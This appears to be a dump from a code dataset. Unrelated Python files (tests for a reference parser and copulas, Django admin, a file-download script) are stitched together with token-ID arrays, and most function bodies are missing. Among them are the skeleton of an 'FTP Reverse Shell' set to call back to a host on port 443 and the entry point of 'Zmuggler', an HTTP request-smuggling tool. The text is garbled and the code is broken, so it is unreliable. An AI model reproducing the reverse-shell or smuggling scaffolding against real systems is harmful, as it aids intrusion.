[ 11748, 6029, 85, 528, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 361, 11593, 3672, 834, 220, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 47764, 796, 279, 67, 13, 961, 62, 40664, 7203, 28650, 1925, 700, 364, 62, 27773...
2.410256
78
from pyftpdlib.authorizers import DummyAuthorizer from pyftpdlib.handlers import FTPHandler from multiprocessing import Process from pyftpdlib import servers from time import sleep from requests import get import socket import psutil import win32api # Al0nnso - 2019 # FTP Reverse Shell # NOT TESTED WITH EXTERN NETWORK try: ip = get('https://api.ipify.org').text except: ip='ERROR' pass ftp=None server = None disk = "\\" address = ("0.0.0.0", 21) user = None host = '192.168.15.5'# YOUR IP OR HOST port = 443 if __name__ == '__main__': socketConn(ftp)
[ 6738, 12972, 701, 30094, 8019, 13, 9800, 11341, 1330, 360, 13513, 13838, 7509, 198, 6738, 12972, 701, 30094, 8019, 13, 4993, 8116, 1330, 45854, 25060, 198, 6738, 18540, 305, 919, 278, 1330, 10854, 198, 6738, 12972, 701, 30094, 8019, 1330,...
2.827586
203
#!/usr/bin/env python3 # coding: utf-8 import os import pytest from deep_reference_parser.io.io import ( read_jsonl, write_jsonl, load_tsv, write_tsv, _split_list_by_linebreaks, _unpack, ) from deep_reference_parser.reference_utils import yield_token_label_pairs from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV def test_load_tsv_train(): """ Text of TEST_TSV_TRAIN: ``` the i-r focus i-r in i-r Daloa i-r , i-r Cte i-r dIvoire]. i-r Bulletin i-r de i-r la i-r Socit i-r de i-r Pathologie i-r Exotique i-r et i-r ``` """ expected = ( ( ("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."), ("Bulletin", "de", "la", "Socit", "de", "Pathologie"), ("Exotique", "et"), ), ( ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r"), ), ) actual = load_tsv(TEST_TSV_TRAIN) assert len(actual[0][0]) == len(expected[0][0]) assert len(actual[0][1]) == len(expected[0][1]) assert len(actual[0][2]) == len(expected[0][2]) assert len(actual[1][0]) == len(expected[1][0]) assert len(actual[1][1]) == len(expected[1][1]) assert len(actual[1][2]) == len(expected[1][2]) assert actual == expected def test_load_tsv_predict(): """ Text of TEST_TSV_PREDICT: ``` the focus in Daloa , Cte dIvoire]. Bulletin de la Socit de Pathologie Exotique et ``` """ expected = ( ( ("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."), ("Bulletin", "de", "la", "Socit", "de", "Pathologie"), ("Exotique", "et"), ), ) actual = load_tsv(TEST_TSV_PREDICT) assert actual == expected def test_load_tsv_train_multiple_labels(): """ Text of TEST_TSV_TRAIN: ``` the i-r a focus i-r a in i-r a Daloa i-r a , i-r a Cte i-r a dIvoire]. i-r a Bulletin i-r a de i-r a la i-r a Socit i-r a de i-r a Pathologie i-r a Exotique i-r a et i-r a token ``` """ expected = ( ( ("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."), ("Bulletin", "de", "la", "Socit", "de", "Pathologie"), ("Exotique", "et"), ), ( ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"), ("i-r", "i-r"), ), ( ("a", "a", "a", "a", "a", "a", "a"), ("a", "a", "a", "a", "a", "a"), ("a", "a"), ), ) actual = load_tsv(TEST_LOAD_TSV) assert actual == expected
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 11748, 28686, 198, 198, 11748, 12972, 9288, 198, 198, 6738, 2769, 62, 35790, 62, 48610, 13, 952, 13, 952, 1330, 357, 198, 220, 220, 22...
1.644327
1,895
import json import responses
[ 11748, 33918, 198, 198, 11748, 9109, 628 ]
4.428571
7
# ___________________________________________________________________________ # # Prescient # Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC # (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S. # Government retains certain rights in this software. # This software is distributed under the Revised BSD License. # ___________________________________________________________________________ from timer import Timer,tic,toc import unittest from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula import numpy as np import scipy import scipy.integrate as spi import scipy.special as sps import scipy.stats as spst from base_distribution import BaseDistribution,MultiDistr from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution from vine import CVineCopula,DVineCopula import matplotlib.pyplot as plt import copula_experiments from copula_experiments.copula_diagonal import diag from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo from distribution_factory import distribution_factory def initialize(dim=2,precision = None,copula_string='independence-copula'): if dim==1: mymean = 0 myvar = 2 dimkeys = ["solar"] data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000) dictin = {"solar": data_array[:, 0]} distr_class = distribution_factory(copula_string) mydistr = distr_class(dimkeys, dictin) return mydistr if dim==2: # For some tests, gaussian and student are less precised so we change so precision asked : dimkeys = ["solar", "wind"] ourmean = [3, 4] rho=0.5 ourcov = [[1, rho], [rho, 1]] data_array = np.random.multivariate_normal(ourmean, ourcov, 1000) dictin = dict.fromkeys(dimkeys) for i in range(dim): dictin[dimkeys[i]] = data_array[:, i] valuedict = {"solar": 0.14, "wind": 0.49} distr_class = distribution_factory(copula_string) mydistr = distr_class(dimkeys, dictin) return mydistr if dim==3: dimkeys = ["solar", "wind", "tide"] dimension = len(dimkeys) # dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)} ourmean = [0, 0, 0] rho01 = 0.1 rho02 = 0.3 rho12 = 0 ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]] marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]), "wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]), "tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])} data_array = np.random.multivariate_normal(ourmean, ourcov, 1000) dictin = dict.fromkeys(dimkeys) for i in range(dimension): dictin[dimkeys[i]] = data_array[:, i] distr_class = distribution_factory(copula_string) mydistr = distr_class(dimkeys, dictin) return mydistr if __name__ == '__main__': i=0 for distr in ['empirical-copula']: CopulaTester().test_plot(distr) i=+1 print(i)
[ 2, 220, 220, 27193, 2602, 17569, 198, 2, 198, 2, 220, 1763, 3456, 198, 2, 220, 15069, 12131, 2351, 8987, 1222, 14044, 23555, 286, 3837, 544, 11, 11419, 198, 2, 220, 357, 11251, 7597, 737, 4698, 262, 2846, 286, 17453, 5550, 12, 4535,...
2.51663
1,353
from django.contrib import admin from inbound.models import Rule, InboundIP # Register your models here. admin.site.register(Rule, RuleAdmin)
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 287, 7784, 13, 27530, 1330, 14330, 11, 554, 7784, 4061, 198, 198, 2, 17296, 534, 4981, 994, 13, 628, 628, 198, 28482, 13, 15654, 13, 30238, 7, 31929, 11, 14330, 46787, 8, 19...
3.418605
43
from django import forms
[ 6738, 42625, 14208, 1330, 5107, 198 ]
4.166667
6
from collections import Counter if __name__ == '__main__': #print(solution("FRANCE", "french")) print(solution("E=M*C^2", "e=m*c^2"))
[ 6738, 17268, 1330, 15034, 628, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1303, 4798, 7, 82, 2122, 7203, 10913, 19240, 1600, 366, 69, 3532, 48774, 198, 220, 220, 220, 3601, 7, 82, 2122, 7203, ...
2.423729
59
#!/bin/env python # Copyright STIFTELSEN SINTEF 2016 import suds import urllib2 import sys if len(sys.argv) < 4: print ("Usage:") print ("\t %s gss-url outputfilename token" % sys.argv[0]) exit() # get url: url = sys.argv[1] outputfileName = sys.argv[2] sessionToken = sys.argv[3] wsdlLocation = "https://api.caxman.eu/sintef/infrastructure/gss-0.1/FileUtilities?wsdl" client = suds.client.Client(wsdlLocation) resourceInformation = client.service.getResourceInformation(url, sessionToken) readDescription = resourceInformation.readDescription if readDescription.supported: headers = {} headers[readDescription.sessionTokenField] = sessionToken if hasattr(readDescription, "headers"): for headerField in readDescription.headers: headers[headerField.key] = headerField.value with open(outputfileName, "wb") as outputFile: request = urllib2.Request(url = readDescription.url, headers=headers) result = urllib2.urlopen(request) while True: buffer = result.read() if not buffer: break outputFile.write(buffer) else: print "The given gss_url does not support read/download."
[ 2, 48443, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 3563, 32297, 37142, 1677, 311, 1268, 9328, 37, 1584, 198, 198, 11748, 424, 9310, 198, 11748, 2956, 297, 571, 17, 198, 11748, 25064, 198, 361, 18896, 7, 17597, 13, 853, 85, 8, 127...
2.543568
482
#!/usr/bin/python3 from requests import Request, Session from requests.exceptions import ReadTimeout import urllib3, requests, collections, http.client, optparse, sys, os print("""\033[1;36m _____ _ |__ /_ __ ___ _ _ __ _ __ _| | ___ _ __ / /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__| / /_| | | | | | |_| | (_| | (_| | | __/ | /____|_| |_| |_|\__,_|\__, |\__, |_|\___|_| |___/ |___/ | Zmuggler | | @electronicbots | \033[1;m""") http.client._header_name = lambda x: True http.client._header_value = lambda x: False urllib3.disable_warnings() if __name__ == '__main__': arguments = Args() if '--target' in str(sys.argv): target = (arguments.link) hrs = ZSmuggler(target) hrs.expl0it() else: print("Try ./Zmuggler.py --help")
[ 2, 48443, 14629, 14, 8800, 14, 29412, 18, 198, 6738, 7007, 1330, 19390, 11, 23575, 198, 6738, 7007, 13, 1069, 11755, 1330, 4149, 48031, 198, 11748, 2956, 297, 571, 18, 11, 7007, 11, 17268, 11, 2638, 13, 16366, 11, 2172, 29572, 11, 2...
1.837838
518
#coding: utf-8 #import cl_to_xi_full from __future__ import print_function from builtins import range import numpy as np from cosmosis.datablock import option_section, names as section_names from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
[ 2, 66, 7656, 25, 3384, 69, 12, 23, 198, 2, 11748, 537, 62, 1462, 62, 29992, 62, 12853, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 6738, 3170, 1040, 1330, 2837, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 8615, 76, ...
2.876033
121
""" The ``video`` taxon groups applets implementing video interfaces, that is, interfaces for periodic transfers of 2d arrays of samples of electromagnetic wave properties. Examples: VGA output, TFT LCD capture, TFT LCD output. Counterexamples: SCSI scanner (use taxon ``photo``), SPI LCD output (use taxon ``display``). """
[ 37811, 198, 464, 7559, 15588, 15506, 1687, 261, 2628, 598, 5289, 15427, 2008, 20314, 11, 326, 318, 11, 20314, 329, 27458, 198, 7645, 69, 364, 286, 362, 67, 26515, 286, 8405, 286, 31094, 6769, 6608, 13, 198, 198, 27730, 25, 569, 9273, ...
3.835294
85
""" The vasprun.xml parser interface. --------------------------------- Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content. """ # pylint: disable=abstract-method, too-many-public-methods import numpy as np from parsevasp.vasprun import Xml from parsevasp import constants as parsevaspct from aiida_vasp.parsers.content_parsers.base import BaseFileParser from aiida_vasp.utils.compare_bands import get_band_properties def _build_structure(lattice): """Builds a structure according to AiiDA spec.""" structure_dict = {} structure_dict['unitcell'] = lattice['unitcell'] structure_dict['sites'] = [] # AiiDA wants the species as symbols, so invert elements = _invert_dict(parsevaspct.elements) for pos, specie in zip(lattice['positions'], lattice['species']): site = {} site['position'] = np.dot(pos, lattice['unitcell']) site['symbol'] = elements[specie].title() site['kind_name'] = elements[specie].title() structure_dict['sites'].append(site) return structure_dict def _invert_dict(dct): return dct.__class__(map(reversed, dct.items()))
[ 37811, 198, 464, 34439, 1050, 403, 13, 19875, 30751, 7071, 13, 198, 198, 3880, 12, 198, 4264, 1299, 262, 32096, 20314, 284, 7559, 29572, 85, 5126, 15506, 973, 284, 21136, 7559, 11017, 1050, 403, 13, 19875, 15506, 2695, 13, 198, 37811, ...
2.787952
415
from django.contrib import admin from .models import Produto, TipoProduto, Estoque # Register your models here. admin.site.register(TipoProduto, TipoProdutoAdmin) admin.site.register(Estoque, EstoqueAdmin) admin.site.register(Produto, ProdutoAdmin)
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 764, 27530, 1330, 1041, 67, 9390, 11, 23095, 78, 2964, 67, 9390, 11, 10062, 78, 4188, 198, 198, 2, 17296, 534, 4981, 994, 13, 198, 28482, 13, 15654, 13, 30238, 7, 28434, 78,...
2.852273
88
import gd, itertools from cube import calculate_cube from ball import calculate_ball from helpers import average client = gd.Client() modes = {gd.PortalType.CUBE: calculate_cube, gd.PortalType.SHIP: calculate_ship, gd.PortalType.BALL: calculate_ball, gd.PortalType.BALL: calculate_ufo, gd.PortalType.UFO: calculate_ufo, gd.PortalType.WAVE: calculate_wave, gd.PortalType.ROBOT: calculate_robot, gd.PortalType.SPIDER: calculate_spider, gd.Gamemode.CUBE: calculate_cube, gd.Gamemode.SHIP: calculate_ship, gd.Gamemode.BALL: calculate_ball, gd.Gamemode.BALL: calculate_ufo, gd.Gamemode.UFO: calculate_ufo, gd.Gamemode.WAVE: calculate_wave, gd.Gamemode.ROBOT: calculate_robot, gd.Gamemode.SPIDER: calculate_spider} if __name__ == "__main__": star = main() print(star)
[ 11748, 308, 67, 11, 340, 861, 10141, 198, 6738, 23441, 1330, 15284, 62, 40296, 198, 6738, 2613, 1330, 15284, 62, 1894, 198, 6738, 49385, 1330, 2811, 198, 198, 16366, 796, 308, 67, 13, 11792, 3419, 198, 198, 76, 4147, 796, 1391, 21287,...
2.112676
426
from collections import defaultdict c=defaultdict(set) f=lambda:[int(i) for i in input().split()] a,b=f() s,e=f() for i in range(s,e+1): x=i%a==0 y=i%b==0 if x and y: c[3].add(i) elif x and not y: c[1].add(i) elif y and not x: c[2].add(i) else: c[4].add(i) o=[] for i in range(1,5): o.append(str(len(c[i]))) print(' '.join(o))
[ 6738, 17268, 1330, 4277, 11600, 198, 66, 28, 12286, 11600, 7, 2617, 8, 198, 69, 28, 50033, 33250, 600, 7, 72, 8, 329, 1312, 287, 5128, 22446, 35312, 3419, 60, 198, 64, 11, 65, 28, 69, 3419, 198, 82, 11, 68, 28, 69, 3419, 198, ...
1.971098
173
"""Module with useful exceptions for Parser."""
[ 37811, 26796, 351, 4465, 13269, 329, 23042, 263, 526, 15931, 628, 628, 198 ]
4
13
import json import next.utils as utils from next.apps.AppDashboard import AppDashboard
[ 11748, 33918, 198, 11748, 1306, 13, 26791, 355, 3384, 4487, 198, 6738, 1306, 13, 18211, 13, 4677, 43041, 3526, 1330, 2034, 43041, 3526, 628, 198 ]
3.56
25
import os import compas from compas.datastructures import Mesh HERE = os.path.dirname(__file__) DATA = os.path.join(HERE, 'data') FILE = os.path.join(DATA, 'faces.obj') mesh = Mesh.from_obj(FILE) print(mesh.summary())
[ 11748, 28686, 198, 11748, 552, 292, 198, 6738, 552, 292, 13, 19608, 459, 1356, 942, 1330, 47529, 198, 198, 39, 9338, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 834, 7753, 834, 8, 198, 26947, 796, 28686, 13, 6978, 13, 22179, 7, 39, ...
2.54023
87
#!/usr/bin/env python # # Copyright 2019 DFKI GmbH. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the # following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN # NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE # USE OR OTHER DEALINGS IN THE SOFTWARE. from PySignal import Signal from .animation_controller import AnimationController from ..scene.components import ComponentBase
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 15069, 13130, 360, 26236, 40, 402, 2022, 39, 13, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 198, 2, 4866, 286, ...
3.832817
323